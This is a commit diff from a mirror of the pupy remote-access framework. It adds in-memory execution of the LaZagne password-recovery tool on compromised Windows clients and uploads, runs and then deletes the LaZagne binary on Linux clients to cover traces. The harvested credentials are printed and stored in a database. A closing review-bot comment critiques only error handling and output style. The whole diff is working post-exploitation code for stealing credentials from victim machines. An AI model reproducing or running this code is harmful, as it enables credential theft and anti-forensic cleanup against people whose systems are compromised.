mirror of https://github.com/n1nj4sec/pupy.git
In-memory LaZagne module from AlessandroZ
parent
d00ed46a91
commit
f0e60a7606
|
@ -10,3 +10,7 @@
|
||||||
path = pupy/external/LaZagne
|
path = pupy/external/LaZagne
|
||||||
url = https://github.com/AlessandroZ/LaZagne
|
url = https://github.com/AlessandroZ/LaZagne
|
||||||
shallow = true
|
shallow = true
|
||||||
|
[submodule "pupy/external/impacket"]
|
||||||
|
path = pupy/external/impacket
|
||||||
|
url = https://github.com/CoreSecurity/impacket
|
||||||
|
shallow = true
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 8af9271f656b6d420466f8bcaec8b81253388340
|
|
@ -1,4 +1,6 @@
|
||||||
# -*- coding: UTF8 -*-
|
# -*- coding: UTF8 -*-
|
||||||
|
# Author: AlessandroZ
|
||||||
|
|
||||||
from pupylib.PupyModule import *
|
from pupylib.PupyModule import *
|
||||||
from pupylib.PupyCompleter import *
|
from pupylib.PupyCompleter import *
|
||||||
from rpyc.utils.classic import upload
|
from rpyc.utils.classic import upload
|
||||||
|
@ -6,6 +8,7 @@ from pupylib.utils.credentials import Credentials
|
||||||
import tempfile
|
import tempfile
|
||||||
import subprocess
|
import subprocess
|
||||||
import os.path
|
import os.path
|
||||||
|
from pupylib.utils.rpyc_utils import redirected_stdo
|
||||||
|
|
||||||
__class_name__="LaZagne"
|
__class_name__="LaZagne"
|
||||||
|
|
||||||
|
@ -16,56 +19,100 @@ class LaZagne(PupyModule):
|
||||||
"""
|
"""
|
||||||
def init_argparse(self):
|
def init_argparse(self):
|
||||||
self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__)
|
self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__)
|
||||||
|
self.arg_parser.add_argument("-v", "--verbose", action='store_true')
|
||||||
|
|
||||||
def run(self, args):
|
def run(self, args):
|
||||||
platform=self.client.desc["platform"]
|
platform=self.client.desc["platform"]
|
||||||
isWindows = True
|
|
||||||
if "Windows" in platform:
|
if "Windows" in platform:
|
||||||
lazagne_path = self.client.pupsrv.config.get("lazagne","win")
|
if "64" in self.client.desc["proc_arch"]:
|
||||||
|
self.error('Not yet implemented for a x64 bits process, migrate to a 32 bits process and try again ! \nEx: run migrate -c \'C:\\Windows\\SysWOW64\\notepad.exe\'')
|
||||||
|
return
|
||||||
|
|
||||||
|
# load all dependency
|
||||||
|
self.client.load_dll(os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "packages", "windows", "x86", "sqlite3.dll")))
|
||||||
|
self.client.load_package("sqlite3")
|
||||||
|
self.client.load_package("_sqlite3")
|
||||||
|
self.client.load_package("xml")
|
||||||
|
self.client.load_package("_elementtree")
|
||||||
|
self.client.load_package("pyexpat") # needed for _elementtree module
|
||||||
|
self.client.load_package("win32crypt")
|
||||||
|
self.client.load_package("win32api")
|
||||||
|
self.client.load_package("win32con")
|
||||||
|
self.client.load_package("win32cred")
|
||||||
|
self.client.load_package("colorama")
|
||||||
|
self.client.load_package("impacket")
|
||||||
|
self.client.load_package("calendar")
|
||||||
|
self.client.load_package("win32security")
|
||||||
|
self.client.load_package("win32net")
|
||||||
|
self.client.load_package("lazagne")
|
||||||
|
|
||||||
|
db = Credentials()
|
||||||
|
|
||||||
|
moduleNames = self.client.conn.modules["lazagne.config.manageModules"].get_modules()
|
||||||
|
for module in moduleNames:
|
||||||
|
if args.verbose:
|
||||||
|
self.info("running module %s"%(str(module).split(' ',1)[0].strip('<')))
|
||||||
|
passwords = module.run(module.options['dest'].capitalize())
|
||||||
|
self.print_results(module.options['dest'].capitalize(), passwords, db)
|
||||||
|
|
||||||
elif "Linux" in platform:
|
elif "Linux" in platform:
|
||||||
isWindows = False
|
isWindows = False
|
||||||
if "64" in self.client.desc["os_arch"]:
|
if "64" in self.client.desc["os_arch"]:
|
||||||
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64")
|
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64")
|
||||||
else:
|
else:
|
||||||
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32")
|
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32")
|
||||||
else:
|
|
||||||
self.error("Platform not supported")
|
if not os.path.isfile(lazagne_path):
|
||||||
return
|
self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path)
|
||||||
|
self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases')
|
||||||
|
return
|
||||||
|
|
||||||
|
tf = tempfile.NamedTemporaryFile()
|
||||||
|
dst = tf.name
|
||||||
|
tf.file.close()
|
||||||
|
|
||||||
if not os.path.isfile(lazagne_path):
|
self.success("Uploading laZagne to: %s" % dst)
|
||||||
self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path)
|
upload(self.client.conn, lazagne_path, dst)
|
||||||
self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases')
|
|
||||||
return
|
|
||||||
|
|
||||||
tf = tempfile.NamedTemporaryFile()
|
|
||||||
dst = tf.name
|
|
||||||
if isWindows:
|
|
||||||
remoteTempFolder = self.client.conn.modules['os.path'].expandvars("%TEMP%")
|
|
||||||
tfName = tf.name.split(os.sep)
|
|
||||||
tfName = tfName[len(tfName)-1] + '.exe'
|
|
||||||
dst = self.client.conn.modules['os.path'].join(remoteTempFolder, tfName)
|
|
||||||
tf.file.close()
|
|
||||||
|
|
||||||
self.success("Uploading laZagne to: %s" % dst)
|
|
||||||
upload(self.client.conn, lazagne_path, dst)
|
|
||||||
|
|
||||||
if not isWindows:
|
|
||||||
self.success("Adding execution permission")
|
self.success("Adding execution permission")
|
||||||
cmd = ["chmod", "+x", dst]
|
cmd = ["chmod", "+x", dst]
|
||||||
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
||||||
|
|
||||||
self.success("Executing")
|
self.success("Executing")
|
||||||
cmd = [dst, "all"]
|
cmd = [dst, "all"]
|
||||||
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
||||||
self.success("%s" % output)
|
self.success("%s" % output)
|
||||||
|
|
||||||
creds = self.parse_output(output)
|
creds = self.parse_output(output)
|
||||||
db = Credentials()
|
db = Credentials()
|
||||||
db.add(creds)
|
db.add(creds)
|
||||||
self.success("Passwords stored on the database")
|
self.success("Passwords stored on the database")
|
||||||
|
|
||||||
self.success("Cleaning traces")
|
self.success("Cleaning traces")
|
||||||
self.client.conn.modules['os'].remove(dst)
|
self.client.conn.modules['os'].remove(dst)
|
||||||
|
|
||||||
|
else:
|
||||||
|
self.error("Platform not supported")
|
||||||
|
return
|
||||||
|
|
||||||
|
def print_results(self, module, creds, db):
|
||||||
|
if creds:
|
||||||
|
print "\n############## %s passwords ##############\n" % module
|
||||||
|
clean_creds = []
|
||||||
|
for cred in creds:
|
||||||
|
clean_cred = {}
|
||||||
|
clean_cred['Tool'] = 'Lazagne'
|
||||||
|
for c in cred.keys():
|
||||||
|
clean_cred[c] = cred[c].encode('utf-8')
|
||||||
|
print "%s: %s" % (c, cred[c])
|
||||||
|
print
|
||||||
|
clean_creds.append(clean_cred)
|
||||||
|
|
||||||
|
try:
|
||||||
|
db.add(clean_creds)
|
||||||
|
self.success("Passwords stored on the database")
|
||||||
|
except Exception, e:
|
||||||
|
print e
|
||||||
|
|
||||||
def parse_output(self, output):
|
def parse_output(self, output):
|
||||||
creds = []
|
creds = []
|
||||||
|
@ -110,5 +157,5 @@ class LaZagne(PupyModule):
|
||||||
key, value = line.split(':', 1)
|
key, value = line.split(':', 1)
|
||||||
cred[key] = value.strip()
|
cred[key] = value.strip()
|
||||||
except:
|
except:
|
||||||
pass
|
pass
|
||||||
return creds
|
return creds
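Review bot: In the new `print_results`, a failure of `db.add(clean_creds)` is reduced to `print e`, so the operator gets a bare message that does not say which module's results were left unstored, and it bypasses the `self.error`/`self.success` methods that `run` uses for all other output; `self.error("Could not store %s results: %s" % (module, e))` would keep it consistent. The same method writes every recovered value to stdout with bare `print`, which leaves cleartext credentials in terminal scrollback and any session logging on the operator side, so it deserves a comment saying this is intentional, or an option that reports only the stored count. `cred[c].encode('utf-8')` sits outside the `try` and assumes every value is a string, so a non-string value would raise before anything is stored. In `run`, the Linux branch still assigns `isWindows = False`, which nothing on the new side appears to read.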
|
||||||
|
|